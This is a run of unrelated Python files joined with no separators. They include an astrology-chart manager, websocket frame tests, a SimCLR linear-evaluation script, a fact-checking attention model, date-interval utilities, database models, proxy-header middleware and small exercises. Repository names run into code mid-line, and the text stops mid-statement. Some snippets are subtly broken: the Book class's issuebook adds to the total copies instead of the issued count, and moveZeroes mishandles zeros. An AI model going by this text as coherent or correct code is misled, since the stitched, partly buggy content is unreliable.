Manager(object): "manage component interactions" def __init__(self,app,opts,state): global boss self.home_dir = app.home_dir self.config_file = app.config_file self.app = app self.version = app.version self.opts = opts self.opts.zodiac = Zodiac(self.opts.transtyle) self.state = state self.ipshell = None self.datab = database boss = self chart.boss = self self.slotter = Slot SimpleAspectManager.orbs = state.orbs SimpleAspectManager.peorbs = state.peorbs SimpleAspectManager.trorbs = state.transits self.suffixes = suffixes f = open('astronex/resources/ac.pk') self.acpaths = pickle.load(f) f.close() def set_mainwin(self,mainwin): self.mainwin = mainwin self.da = self.mainwin.da self.mainwin.mpanel.browser.chartview.mainwin = mainwin # @!#? self.mpanel = mainwin.mpanel self.state.act_pool = MainPanel.actualize_pool mainwin.mpanel.init_pools() view = self.mpanel.chooser.notebook.get_nth_page(0) view.set_cursor(0,) view.grab_focus() self.da.drawer.hoff = self.da.allocation.width * 0.125 self.da.drawer.gridw = self.da.drawer.hoff * 6 self.da.drawer.set_AP_DEG() # winmain services def get_homer_dir(self): return app.home_dir def set_fullscreen_state(self,flag): self.da.__class__.fullscreen = flag ################################# def parse_colors(self): return config.parse_colors() def parse_aux_colors(self): return config.parse_aux_colors() def get_colors(self): return config.cfgcols def reset_colors(self): config.reset_colors(self.opts) def redraw(self,both=True): if both: self.da.redraw() if self.mainwin.plagram: self.mainwin.plagram.sda.redraw() def get_state(self): return self.state def get_database(self): return self.datab def get_version(self): return self.version ##### def get_showEA(self): return self.da.drawer.get_showEA() ##### pdf def set_pdf(self,paper,labels=False): from surfaces import pdfsurface as surf surf.PDFW, surf.PDFH = surf.papers[paper] surf.pdflabels = labels def set_pdf_custom(self,w,h): from surfaces import pdfsurface as surf surf.papers['custom'] = (w,h) ##### scripts loading def load_script(self,script): sc = ".".join(['astronex.scripts',script]) mod = __import__(sc) components = sc.split('.') for comp in components[1:]: mod = getattr(mod, comp) mod = getattr(mod,script) return mod(self) ##### chart - Chart interface def giveme_single_chartob(self,kind='radix'): singles = {'radix':RadixChart,'house':HouseChart,'nodal':NodalChart, 'soul':SoulChart} st = self.get_state() return singles[kind](st.curr_chart,st.curr_click) def get_simple_amanager(self): return SimpleAspectManager() def swap_to_ten(self): self.da.drawer.aspmanager.swap_to_ten() self.da.redraw() def swap_to_twelve(self): self.da.drawer.aspmanager.swap_to_twelve() self.da.redraw() ##### shell util def prepare_shell(self,kind='radix'): ch = self.giveme_single_chartob(kind) am = self.get_simple_amanager() return ch,am def calc_house_ap(self,h): c = self.get_state().curr_chart co = boss.giveme_single_chartob() p = co.sortplan() return c.calc_house_agep(p,h) def list_click_aspects(self,kind='hh'): clicks = { 'hh': HouseHouseChart, 'hn': HouseHouseChart, 'nn': NodalNodalChart, 'nh': NodalNodalChart, 'ss': SoulSoulChart, 'rr': RadixRadixChart } st = self.get_state() chobj = clicks[kind](st.curr_chart,st.curr_click) am = self.get_simple_amanager() if kind in ['nn','nh']: p1 = chobj.get_planets(True) else: p1 = chobj.get_planets() chobj.swap_charts() if kind == 'nn': p2 = chobj.get_planets(True) elif kind == 'hn': chobj.__class__ = NodalNodalChart p2 = chobj.get_planets(True) elif kind == 'nh': chobj.__class__ = 
HouseHouseChart p2 = chobj.get_planets() else: p2 = chobj.get_planets() aspects = set(am.twelve_aspects(p1,p2)) gw = set(a for a in aspects if a.f1 > 1 and a.f2 > 1) aspects.difference_update(gw) conj = set(a for a in aspects if a.a == 0) aspects.difference_update(conj) noopos = set(a for a in aspects if a.a != 6) aspects.difference_update(noopos) print 'conj' for a in conj: print a.p1, a.p2 print 'opos' for a in aspects: print a.p1, a.p2 def load_one_fav(self): if not self.state.fav: return ix = self.state.fav_ix active = Slot.storage self.state.load_from_fav(ix,active) MainPanel.actualize_pool(active,self.state.charts[active]) ix = (ix + 1) % len(self.state.fav) self.state.fav_ix = ix def solar_rev(self): solar_rev(self) def sec_prog(self): sec_prog(self) def load_couple(self): if not self.state.couples: return ix = self.state.coup_ix chart = self.state.charts['master'] table = self.state.couples[ix]['fem'][1] id = self.state.couples[ix]['fem'][2] self.state.datab.load_chart(table,id,chart) self.mpanel.actualize_pool('master',chart) chart = self.state.charts['click'] table = self.state.couples[ix]['mas'][1] id = self.state.couples[ix]['mas'][2] self.state.datab.load_chart(table,id,chart) self.mpanel.actualize_pool('click',chart) ix = (ix + 1) % len(self.state.couples) self.state.coup_ix = ix def search_couple(self,female,male): for c in self.state.couples: if ((c['fem'][0] == female and c['mas'][0] == male) or (c['fem'][0] == male and c['mas'][0] == female)): return c['dates'] return None class Book: def __init__(self): self.BookNumber=0 self.BookName='' self.Author='' self.Publisher='' self.Price=0.0 self.noofcopies=0 self.noofcopiesissued=0 def entbook(self): self.BookNumber=input('Enter book number: ') self.BookName=raw_input('Enter book name: ') self.Author=raw_input('Enter Author name: ') self.Publisher=raw_input('Enter Publisher name: ') self.Price=float(input('Enter price of book: ')) self.noofcopies=input('Enter number of copies: ') self.noofcopiesissued=input('Enter number of copies issued: ') def issuebook(self): if self.noofcopies-self.noofcopiesissued>=1: self.noofcopies+=1 def returnbook(self): self.noofcopiesissued-=1 def display(self): print 'Book number',self.BookNumber print 'Book name',self.BookName print 'Author name',self.Author print 'Publisher name',self.Publisher print 'Price of book',self.Price print 'Number of copies',self.noofcopies print 'Number of copies issued',self.noofcopiesissued tests/utils/test_frame.py from random import randint import struct import unittest from pulsar.api import ProtocolError from pulsar.utils.websocket import frame_parser, parse_close def i2b(args): return bytes(bytearray(args)) class FrameTest(unittest.TestCase): @classmethod def setUpClass(cls): cls.bdata = i2b((randint(0, 255) for v in range(256))) cls.large_bdata = i2b((randint(0, 255) for v in range(64*1024))) def parser(self, pyparser=False, **kw): return frame_parser(**kw) def test_version(self): self.assertRaises(ProtocolError, self.parser, version='bla') def test_server(self): server = self.parser() self.assertEqual(server.decode_mask_length, 4) self.assertEqual(server.encode_mask_length, 0) self.assertEqual(server.max_payload, 1 << 63) def test_both_masked(self): server = self.parser(kind=2) self.assertEqual(server.decode_mask_length, 0) self.assertEqual(server.encode_mask_length, 0) server = self.parser(kind=3) self.assertEqual(server.decode_mask_length, 4) self.assertEqual(server.encode_mask_length, 4) def testCloseFrame(self): parser = self.parser(kind=2) close_message = 
struct.pack('!H', 1000) + b'OK' f = parser.encode(close_message, opcode=0x8) self.assertEqual(close_message, f[2:]) def testControlFrames(self): s = self.parser() c = self.parser(kind=1) # chunk = s.close(1001) frame = c.decode(chunk) self.assertTrue(frame.final) self.assertEqual(frame.opcode, 8) code, reason = parse_close(frame.body) self.assertEqual(code, 1001) # chunk = s.ping('Hello') frame = c.decode(chunk) self.assertTrue(frame.final) self.assertEqual(frame.opcode, 9) self.assertEqual(i2b((0x89, 0x05, 0x48, 0x65, 0x6c, 0x6c, 0x6f)), chunk) self.assertEqual(frame.body, b'Hello') self.assertRaises(ProtocolError, s.ping, self.bdata) # chunk = s.pong('Hello') frame = c.decode(chunk) self.assertTrue(frame.final) self.assertEqual(frame.opcode, 10) self.assertEqual(frame.body, b'Hello') self.assertRaises(ProtocolError, s.pong, self.bdata) def test_conntrol_frames_fragmented(self): c = self.parser(kind=1) for opcode in (8, 9, 10): chunk = c.encode('test', opcode=opcode, final=False) s = self.parser() try: s.decode(chunk) except ProtocolError: pass else: raise Exception('Protocol error not raised') def testUnmaskedDataFrame(self): parser = self.parser(kind=2) data = parser.encode('Hello') f = parser.decode(data) self.assertEqual(f.opcode, 1) self.assertEqual(len(f.body), 5) self.assertFalse(f.masking_key) # self.assertEqual(i2b((0x81, 0x05, 0x48, 0x65, 0x6c, 0x6c, 0x6f)), data) f1 = parser.encode('Hel', final=False) f2 = parser.continuation('lo', final=True) self.assertEqual(i2b((0x01, 0x03, 0x48, 0x65, 0x6c)), f1) self.assertEqual(i2b((0x80, 0x02, 0x6c, 0x6f)), f2) def testBinaryDataFrame(self): s = self.parser() c = self.parser(kind=1) # chunk = s.encode(self.bdata, opcode=2) frame = c.decode(chunk) self.assertEqual(frame.opcode, 2) self.assertFalse(frame.masking_key) self.assertEqual(frame.body, self.bdata) self.assertEqual(struct.pack('!BBH', 0x82, 0x7E, 0x0100), chunk[:4]) # chunk = s.encode(self.large_bdata, opcode=2) frame = c.decode(chunk) self.assertEqual(frame.opcode, 2) self.assertFalse(frame.masking_key) self.assertEqual(frame.body, self.large_bdata) self.assertEqual(struct.pack('!BBQ', 0x82, 0x7F, 0x0000000000010000), chunk[:10]) def testMaskData(self): client = self.parser(kind=1) masking_key = i2b((0x37, 0xfa, 0x21, 0x3d)) chunk = client.encode('Hello', masking_key=masking_key) msg = i2b((0x81, 0x85, 0x37, 0xfa, 0x21, 0x3d, 0x7f, 0x9f, 0x4d, 0x51, 0x58)) self.assertEqual(chunk, msg) def testParserBinary(self): s = self.parser() c = self.parser(kind=1) chunk = c.encode(self.bdata, opcode=2) frame = s.decode(chunk) self.assertTrue(frame) self.assertEqual(frame.body, self.bdata) # # Now try different masking key chunk = c.encode(self.large_bdata, opcode=2, masking_key=b'ciao') frame = s.decode(chunk) self.assertTrue(frame) self.assertEqual(frame.body, self.large_bdata) def testPartialParsing(self): s = self.parser() c = self.parser(kind=1) chunk = s.encode(self.large_bdata, opcode=2) # self.assertEqual(c.decode(chunk[:1]), None) self.assertEqual(c.decode(chunk[1:5]), None) self.assertEqual(c.decode(chunk[5:50]), None) frame = c.decode(chunk[50:]) self.assertTrue(frame) self.assertEqual(frame.body, self.large_bdata) self.assertEqual(frame.opcode, 2) def test_multi_encode(self): s = self.parser() c = self.parser(kind=1) chunks = list(s.multi_encode(self.large_bdata, opcode=2, max_payload=6500)) self.assertEqual(len(chunks), 11) # # Now decode them frames = [] for chunk in chunks: frames.append(c.decode(chunk)) for frame in frames[:-1]: self.assertFalse(frame.final) 
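# --- Added sketch (not part of the test suite above) ---
# A minimal, stdlib-only illustration of the client-side masking rule that
# testMaskData above exercises: a client data frame sets the MASK bit and XORs
# its payload with a 4-byte masking key (RFC 6455). The header handling here
# only covers short text payloads; pulsar's frame_parser does much more.
import struct

def mask_text_frame(payload, masking_key):
    assert len(masking_key) == 4 and len(payload) < 126
    header = struct.pack('!BB', 0x81, 0x80 | len(payload))  # FIN + text opcode, MASK bit + 7-bit length
    masked = bytes(b ^ masking_key[i % 4] for i, b in enumerate(payload))
    return header + masking_key + masked

# Reproduces the byte string asserted in testMaskData:
assert mask_text_frame(b'Hello', bytes([0x37, 0xfa, 0x21, 0x3d])) == bytes(
    [0x81, 0x85, 0x37, 0xfa, 0x21, 0x3d, 0x7f, 0x9f, 0x4d, 0x51, 0x58])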
self.assertTrue(frames[-1].final) msg = b''.join((f.body for f in frames)) self.assertEqual(msg, self.large_bdata) def test_bad_mask(self): s = self.parser() chunk = s.encode('hello') self.assertRaises(ProtocolError, s.decode, chunk) # # and the client c = self.parser(kind=1) chunk = c.encode('hello') self.assertRaises(ProtocolError, c.decode, chunk) def test_symmetric_mask(self): s = self.parser(kind=2) chunk = s.encode('Hello') self.assertEqual(s.decode(chunk).body, 'Hello') s = self.parser(kind=3) chunk = s.encode('Hello') self.assertEqual(s.decode(chunk).body, 'Hello') def test_parse_close(self): self.assertRaises(ProtocolError, parse_close, b'o') # Definition for singly-linked list. class Node(object): def __init__(self, x): self.val = x self.next = None class Solution(object): def mergeKLists(self, lists): # find start node pendings = [] start = None for list in lists: show(list) if list != None and (start == None or list.val < start.val): start = list for n in lists: if n != start and n != None: pendings.append(n) else: if n!=None and n.next != None: pendings.append(n.next) p=start while len(pendings)>0: next = None for n in pendings: if n==None: continue if next==None or next.val > n.val: next = n p.next = next p=p.next next_pendings = [] for n in pendings: if n!=next: next_pendings.append(n) else: if n.next != None: next_pendings.append(n.next) pendings = next_pendings return start def show(n): s = "" while n != None: s += str(n.val) + "->" n = n.next print(s) def test(): ss = Solution() n11 = Node(1) n12 = Node(2) n11.next = n12 n21 = Node(1) n22 = Node(3) n21.next = n22 r=ss.mergeKLists([n11,n21,None]) show(r) test() mesarcik/simclr0 import numpy as np import os import torch import torch.backends.cudnn as cudnn from tqdm import tqdm from sklearn.svm import SVC from sklearn.manifold import TSNE from matplotlib import pyplot as plt from sklearn.metrics import classification_report, confusion_matrix from data import get_data from model import Resnet from utils import _colors, _cifar10_labels, load_checkpoint _batch_size =1024 _gpu=0 def vis_embeddings(model_dir, z_test, z_test_labels, limit=2000): z_embedded = TSNE(n_components=2, learning_rate='auto',init='random').fit_transform(z_test) for i in range(limit): plt.scatter(z_embedded[i,0], z_embedded[i,1], color = _colors[int(z_test_labels[i])], label = _cifar10_labels[int(z_test_labels[i])]); handles, labels = plt.gca().get_legend_handles_labels() by_label = dict(zip(labels, handles)) plt.legend(by_label.values(), by_label.keys()) plt.savefig(os.path.join(model_dir,'embeding'), dpi=300) def linear_classifcation(model_dir,limit=20000): if torch.cuda.is_available(): _device = torch.device('cuda') cudnn.deterministic = True cudnn.benchmark = True # load model model = load_checkpoint(Resnet()) # remove last layer model =torch.nn.Sequential(*list(list(model.children())[0].children())[:-1]) # get z vector with training class trainloader, testloader = get_data('CIFAR10', augment=False, batch_size=_batch_size, size=32, s=1.0) model.cuda() with torch.cuda.device(_gpu): for i,(image_batch, labels_batch) in enumerate(trainloader): if i ==0: z_train = model(image_batch.to(_device)) z_train_labels = labels_batch else: z_train = torch.cat((z_train, model(image_batch.to(_device))), axis=0) z_train_labels = torch.cat((z_train_labels, labels_batch ), axis=0) for i,(image_batch, labels_batch) in enumerate(testloader): if i ==0: z_test = model(image_batch.to(_device)) z_test_labels = labels_batch else: z_test = torch.cat((z_test, 
model(image_batch.to(_device))), axis=0) z_test_labels = torch.cat((z_test_labels, labels_batch ), axis=0) z_train = z_train.cpu().detach().numpy()[:limit,...,0,0] z_train_labels = z_train_labels.cpu().detach().numpy()[:limit] z_test = z_test.cpu().detach().numpy()[:limit,...,0,0] z_test_labels = z_test_labels.cpu().detach().numpy()[:limit] svclassifier = SVC(kernel='linear') svclassifier.fit(z_train, z_train_labels) y = svclassifier.predict(z_test) print(confusion_matrix(z_test_labels,y)) print(classification_report(z_test_labels,y)) vis_embeddings(model_dir,z_test, z_test_labels) mtortora/chiralDFTresources/processing/xyz_converter.py #!/usr/bin/env python import sys import os.path # Input/output if len(sys.argv) in [2,3]: path_in = os.path.realpath(sys.argv[1]) if len(sys.argv) == 3: path_out = sys.argv[2] else: path_out = os.path.dirname(path_in) + "/trajectory.in" else: print("\033[1;31mUsage is %s trajectory [output]\033[0m" % sys.argv[0]) sys.exit() file_in = open(path_in, mode="r") file_out = open(path_out, mode="w") # Parse trajectory c_count = 0 s_line = file_in.readline() while s_line: file_in.readline() c_count += 1 n_s = int(s_line.split()[0]) for idx_s in range(n_s): xs = [float(x) for x in file_in.readline().split()[1:]] file_out.write(" ".join(str(x) for x in xs)) file_out.write("\n") file_out.write("\n\n") s_line = file_in.readline() file_out.close() print("\033[1;32mPrinted %d configurations to '%s'\033[0m" % (c_count, path_out)) 0 class Solution: def moveZeroes(nums): j=1 for i in range(len(nums)-1): if nums[i] == 0: while j < len(nums): if nums[j] == 0: j+=1 else: #swap nums[i], nums[j] = nums[j], 0 break return nums print(Solution.moveZeroes([0,1,2,3]))adrielkuek/IRS-PM-2021-01-16-ISY5001PT-SureBoT import math import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.nn import BatchNorm1d, Linear, ReLU evidence_num = [] # Select CUDA is GPU is availble, else use CPU # device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') class SelfAttentionLayer(nn.Module): def __init__(self, nhid, nins, device, loggerHandle): super(SelfAttentionLayer, self).__init__() self.nhid = nhid self.nins = nins self.project = nn.Sequential( Linear(nhid, 64), ReLU(True), Linear(64, 1) ) self.device = device self.logger = loggerHandle def forward(self, inputs, index, claims): tmp = None if index > -1: # idx = torch.LongTensor([index]).cuda() idx = torch.LongTensor([index]).to(self.device) own = torch.index_select(inputs, 1, idx) own = own.repeat(1, self.nins, 1) tmp = torch.cat((own, inputs), 2) else: claims = claims.unsqueeze(1) claims = claims.repeat(1, self.nins, 1) tmp = torch.cat((claims, inputs), 2) # before attention = self.project(tmp) weights = F.softmax(attention.squeeze(-1), dim=1) print(weights) self.logger.info(weights) evidence_num.append(weights.detach().cpu().numpy()) outputs = (inputs * weights.unsqueeze(-1)).sum(dim=1) return outputs class AttentionLayer(nn.Module): def __init__(self, nins, nhid, device, loggerHandle): super(AttentionLayer, self).__init__() self.nins = nins self.attentions = [SelfAttentionLayer(nhid=nhid * 2, nins=nins, device=device, loggerHandle=loggerHandle) for _ in range(nins)] for i, attention in enumerate(self.attentions): self.add_module('attention_{}'.format(i), attention) def forward(self, inputs): # outputs = torch.cat([att(inputs) for att in self.attentions], dim=1) outputs = torch.cat([self.attentions[i](inputs, i, None) for i in range(self.nins)], dim=1) outputs = outputs.view(inputs.shape) 
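# --- Added sketch (not part of the GEAR model above) ---
# Hedged illustration of the attention pooling that SelfAttentionLayer implements:
# each evidence vector is scored jointly with the claim, the scores are
# softmax-normalised over the evidence axis, and the evidences are summed with
# those weights. Function and variable names here are illustrative only.
import torch
import torch.nn as nn
import torch.nn.functional as F

def attention_pool(evidence, claim, scorer):
    # evidence: (batch, n_evidence, d); claim: (batch, d)
    claim_rep = claim.unsqueeze(1).expand_as(evidence)           # broadcast claim over evidences
    scores = scorer(torch.cat((claim_rep, evidence), dim=-1))    # (batch, n_evidence, 1)
    weights = F.softmax(scores.squeeze(-1), dim=1)               # attention over evidences
    return (evidence * weights.unsqueeze(-1)).sum(dim=1)         # (batch, d)

# e.g. with d = 200:
# scorer = nn.Sequential(nn.Linear(2 * 200, 64), nn.ReLU(), nn.Linear(64, 1))
# pooled = attention_pool(torch.randn(4, 5, 200), torch.randn(4, 200), scorer)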
return outputs class GEAR(nn.Module): def __init__(self, nfeat, nins, nclass, nlayer, pool, device, loggerhandle): super(GEAR, self).__init__() self.nlayer = nlayer self.attentions = [AttentionLayer(nins, nfeat, device, loggerhandle) for _ in range(nlayer)] self.batch_norms = [BatchNorm1d(nins) for _ in range(nlayer)] for i, attention in enumerate(self.attentions): self.add_module('attention_{}'.format(i), attention) self.pool = pool if pool == 'att': self.aggregate = SelfAttentionLayer(nfeat * 2, nins, device, loggerhandle) # self.index = torch.LongTensor([0]).cuda() self.index = torch.LongTensor([0]).to(device) self.weight = nn.Parameter(torch.FloatTensor(nfeat, nclass)) self.bias = nn.Parameter(torch.FloatTensor(nclass)) stdv = 1. / math.sqrt(self.weight.size(1)) self.weight.data.uniform_(-stdv, stdv) self.bias.data.uniform_(-stdv, stdv) def forward(self, inputs, claims): for i in range(self.nlayer): inputs = self.attentions[i](inputs) if self.pool == 'att': inputs = self.aggregate(inputs, -1, claims) if self.pool == 'max': inputs = torch.max(inputs, dim=1)[0] if self.pool == 'mean': inputs = torch.mean(inputs, dim=1) if self.pool == 'top': inputs = torch.index_select(inputs, 1, self.index).squeeze() if self.pool == 'sum': inputs = inputs.sum(dim=1) evi_map = [] for x in range(len(evidence_num)): intermediate_value = evidence_num[x][0] evi_map.append(list(intermediate_value)) inputs = F.relu(torch.mm(inputs, self.weight) + self.bias) evidence_num.clear() return F.log_softmax(inputs, dim=1), evi_map from datetime import datetime from datetime import timedelta from copy import deepcopy import pandas as pd class TimeBubble: def __init__(self, lower: datetime, upper: datetime, delta=timedelta(days=1)): if lower > upper: raise ValueError( 'Upper {} is less then lower {}.'.format(upper, lower)) self.max: datetime = upper self.min: datetime = lower self.mid = self.max.timestamp() + self.min.timestamp() self.leg = self.max.timestamp() - self.min.timestamp() self.delta = delta def __repr__(self): start = self.min end = self.max return 'TimeBubble({}, {})'.format(repr(start), repr(end)) def __str__(self): fmt = '%Y-%m-%d' start = self.min.strftime(fmt) end = self.max.strftime(fmt) return '[{}, {})'.format(start, end) def __contains__(self, value): try: return self.min <= value < self.max except: return self.min <= value.min <= value.max < self.max def __iter__(self): date = self.min while date < self.max: yield date date += self.delta def iter_years(self): min_year: int = self.min.year max_year: int = self.max.year for year in range(min_year, max_year+1): mi = max(self.min, datetime(year, 1, 1)) ma = min(self.max, datetime(year+1, 1, 1)) yield TimeBubble(mi, ma, self.delta) def to_list(self) -> list: return [self.min, self.max] def to_actualrange(self) -> list: return [self.min, self.max-self.delta] def to_mongodb_date_range(self) -> dict: return {'$gte': self.min, '$lt': self.max} def to_mongodb_dates(self, freq) -> dict: date_range = pd.date_range(self.min, self.max-self.delta, freq=freq) return {'$in': [d.to_pydatetime() for d in date_range]} def merge(self, bubble): if self._mergeable(bubble): mi = min(self.min, bubble.min) ma = max(self.max, bubble.max) return TimeBubble(mi, ma), None else: return self, bubble def carve(self, bubble): if self._mergeable(bubble): l = self.min u = bubble.min left = TimeBubble(l, u) if l < u else None l = bubble.max u = self.max right = TimeBubble(l, u) if l < u else None return left, right else: return self, None def intersect(self, bubble): if 
self._mergeable(bubble): mi = max(self.min, bubble.min) ma = min(self.max, bubble.max) return TimeBubble(mi, ma, self.delta) else: return None def _mergeable(self, bubble): return abs(self.mid - bubble.mid) <= (self.leg + bubble.leg) class Bubbles(): def __init__(self, bubbles=[]): self._bubbles = [] for b in (self._convert(b) for b in bubbles): self._bubbles.append(b) self._triple_kill() def __repr__(self): return 'Bubbles({})'.format(self._bubbles) def __str__(self): return '[{}]'.format(',\n'.join([str(b) for b in self._bubbles])) def __contains__(self, value): for b in self._bubbles: if value in b: return True return False def __len__(self): return len(self._bubbles) def __getitem__(self, key): return self._bubbles[key] def __setitem__(self, key, value): try: self._bubbles[key] = self._convert(value) except: raise ValueError( 'Value {} not compatible with Bubbles.'.format(value)) self._triple_kill() def __delitem__(self, key): del self._bubbles[key] def __iter__(self): return iter(self._bubbles) @property def min(self): return self._bubbles[0].min @property def max(self): return self._bubbles[-1].max @property def isempty(self) -> bool: if len(self._bubbles) == 0: return True else: return False def gaps(self, bubble=None): '''Return gaps between bubbles.''' fullbubble = TimeBubble(self.min, self.max) \ if bubble is None else self._convert(bubble) res = Bubbles() try: for b in self._bubbles: l, r = fullbubble.carve(b) fullbubble = r res._bubbles.append(l) except AttributeError: pass finally: res._bubbles.append(fullbubble) res._triple_kill() return res def to_list(self) -> list: res = [] for b in self._bubbles: res.append(b.to_list()) return res def to_actualrange(self) -> list: res = [] for b in self: res.append(b.to_actualrange()) return res def merge(self, bubble): res = Bubbles() res._bubbles = deepcopy(self._bubbles) res._bubbles.append(res._convert(bubble)) res._triple_kill() return res def carve(self, bubble): b_carve = self._convert(bubble) res_list = [] for b in self._bubbles: b1, b2 = b.carve(b_carve) res_list.append(b1) res_list.append(b2) return Bubbles(res_list) def intersect(self, bubble): bubble = self._convert(bubble) res = [] for s in self: i = s.intersect(bubble) res.append(i) return Bubbles(res) def _triple_kill(self): self._drop_none() self._sort() self._squeeze() def _squeeze(self): p = 0 count = len(self._bubbles) while p < count: for q, b_q in ((q, b_q) for q, b_q in enumerate(self._bubbles) if q > p): self._bubbles[p], self._bubbles[q] = self._bubbles[p].merge( b_q) self._drop_none() p += 1 count = len(self._bubbles) def _sort(self): self._bubbles.sort(key=lambda x: x.mid) def _drop_none(self): self._bubbles = [b for b in self._bubbles if b is not None] def _convert(self, value): if isinstance(value, TimeBubble): return value elif value is None: return None else: return TimeBubble(min(value), max(value)) from app import db from datetime import datetime class CompetitionTable(db.Model): __tablename__ = 'competition_tables' id = db.Column(db.Integer, primary_key=True) number = db.Column(db.Integer) name = db.Column(db.String(20)) slots = db.relationship('MatchSlot', backref='competition_table') def __init__(self, number, name): self.number = number self.name = name class MatchSlot(db.Model): __tablename__ = 'match_slots' id = db.Column(db.Integer, primary_key=True) match_id = db.Column(db.Integer, db.ForeignKey('matches.id')) competition_table_id = db.Column(db.Integer, db.ForeignKey('competition_tables.id')) team_id = db.Column(db.Integer, 
db.ForeignKey('teams.id')) def __init__(self, table_id, team_id): self.competition_table_id = table_id self.team_id = team_id class Match(db.Model): __tablename__ = 'matches' id = db.Column(db.Integer, primary_key=True) number = db.Column(db.Integer) match_type = db.Column(db.String(1)) round_number = db.Column(db.Integer) time = db.Column(db.DateTime) slots = db.relationship('MatchSlot', backref='match') def __init__(self, number, match_type, round_number, time): self.number = int(number) self.match_type = match_type self.time = datetime.strptime(time, '%I:%M%p') self.round_number = int(round_number) @property def friendly_type(self): return 'Qualification' if self.match_type == 'Q' else 'Playoff' osoco/better-ways-of-thinking-about-softwarePart-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/lib/x_forwarded_for/middleware.py """ Middleware to use the X-Forwarded-For header as the request IP. Updated the libray to use HTTP_HOST and X-Forwarded-Port as SERVER_NAME and SERVER_PORT. """ from django.utils.deprecation import MiddlewareMixin class XForwardedForMiddleware(MiddlewareMixin): """ Gunicorn 19.0 has breaking changes for REMOTE_ADDR, SERVER_* headers that can not override with forwarded and host headers. This middleware can be used to update these headers set by proxy configuration. """ def process_request(self, request): # lint-amnesty, pylint: disable=useless-return """ Process the given request, update the value of REMOTE_ADDR, SERVER_NAME and SERVER_PORT based on X-Forwarded-For, HTTP_HOST and X-Forwarded-Port headers """ for field, header in [("HTTP_X_FORWARDED_FOR", "REMOTE_ADDR"), ("HTTP_HOST", "SERVER_NAME"), ("HTTP_X_FORWARDED_PORT", "SERVER_PORT")]: if field in request.META: if ',' in request.META[field]: request.META[header] = request.META[field].split(",")[0].strip() else: request.META[header] = request.META[field] return None scripts/craps_Baybay.py num1 = int(input("Enter the first value: ")) if ((num1 < 1) or (num1 > 6)): print("Invalid value") exit() num2 = int(input("Enter the second value: ")) if ((num2 < 1) or (num2 > 6)): print("Invalid value") exit() sum = num1 + num2 if(sum == 7 or sum == 11): print("Congratulations! 
You win!") elif(sum == 2 or sum == 3 or sum == 12): print("Better luck next time.") else: print(f"You have {sum} points.") 1-10 from .base import Base class Atoi(Base): is_loaded = False def __init__(self, compiler): Base.__init__(self, compiler) if Atoi.is_loaded: return self.load('atoi.asm', 'atoi') Atoi.is_loaded = True app/language_features/dictionary/dict_demo.py my_customers = [ ('01', 'XYZ abc', 42.09, ), ('02', 'TR deep', 90.01 ) ] my_other_customers = [ {'ID': '01', 'Name': '', 'Credit': 42.09 }, {'ID': '02', 'Name': '', 'Credit': 90.01 } ] mydict = {'ID': '01', 'Name': '', 'Credit': 42.09 } assert mydict['Credit'] == 42.09 for customer in my_other_customers: print(customer['Name']) for customer in my_other_customers: print(customer.get('Name')) for customer in my_other_customers: customer['Credit'] *= 1.5 for customer in my_other_customers: print(customer.values()) for customer in my_other_customers: for key, value in customer.items(): print(key, value) my_dict = {"Name": "Andy", "Job": "Tutor"} dict_to_list = [] for key, value in my_dict.items(): dict_to_list.append((key, value)) assert dict_to_list == [("Name", "Andy"), ("Job", "Tutor")] people = [ {"Name": "Andy", "Job": "Tutor"}, {"Name": "Fred", "Job": "Analyst"}, {"Name": "Pam", "Job": "Nurse"}, ] assert people[1]["Name"] == "Fred" # dictionary keys must be unique; show what happens when they are not my_dict = { "Name": "Andy", "Job": "Tutor", "Job": "Analyst", "Preferred_name": "Andy", } assert my_dict == {"Name": "Andy", "Job": "Analyst", "Preferred_name": "Andy"} # transpose keys and values my_new_dict = {} for key, value in my_dict.items(): my_new_dict[value] = key assert my_new_dict == {"Analyst": "Job", "Andy": "Preferred_name"} people = [ {"Name": "Andy", "Job": "Tutor"}, {"Name": "Fred", "Job": "Analyst"}, {"Name": "Pam", "Job": "Nurse"}, ] better_people = { 1: {"Name": "Andy", "Job": "Tutor"}, 2: {"Name": "Fred", "Job": "Analyst"}, 3: {"Name": "Pam", "Job": "Nurse"}, } better_people2 = { 'Andy': {"Name": "Andy", "Job": "Tutor"}, 'Fred': {"Name": "Fred", "Job": "Analyst"}, 3: {"Name": "Pam", "Job": "Nurse"}, } assert better_people[2] == {"Name": "Fred", "Job": "Analyst"} assert better_people[2]["Name"] == "Fred" experiments/label_traffic_video.py from __future__ import unicode_literals import os, sys sys.path.insert(0,"/home/autolab/Workspaces/jim_working/env/lib/python2.7/site-packages/") from tcp.object_detection.video_labeler import VideoLabeler from tcp.configs.alberta_config import Config import cPickle as pickle import glob cnfg = Config() vl = VideoLabeler(cnfg) ###GET VIDEOS VIDEO_FILE = '%s/*.mp4' % cnfg.video_root_dir videos = glob.glob(VIDEO_FILE) ###LABEL VIDEOS for video_path in sorted(videos): video_name = os.path.splitext(os.path.basename(video_path))[0] datestamp = video_name.split('_')[-2] timestamp = video_name.split('_')[-1] year, month, date = [int(i) for i in datestamp.split('-')] hour, minute, second = [int(i) for i in timestamp.split('-')] # Setting first video tmp_time = int('%02d%02d%02d' % (date, hour, minute)) if tmp_time < 271201: continue # Setting last video if tmp_time > 271700: break # Process video print '\nRunning video labeler on %s' % (video_name) vl.load_video(video_path) all_rclasses, all_rbboxes = vl.generate_bounding_boxes(debug_pickle=True) all_rclasses, all_rbboxes = vl.run_init_labeler(debug_pickle=True, show_gui=True) camera_view_trajectory = vl.generate_trajectories() with open('{0}/{1}/{1}_trajectories.cpkl'.format(cnfg.save_debug_pickles_path, video_name),'wb+') as 
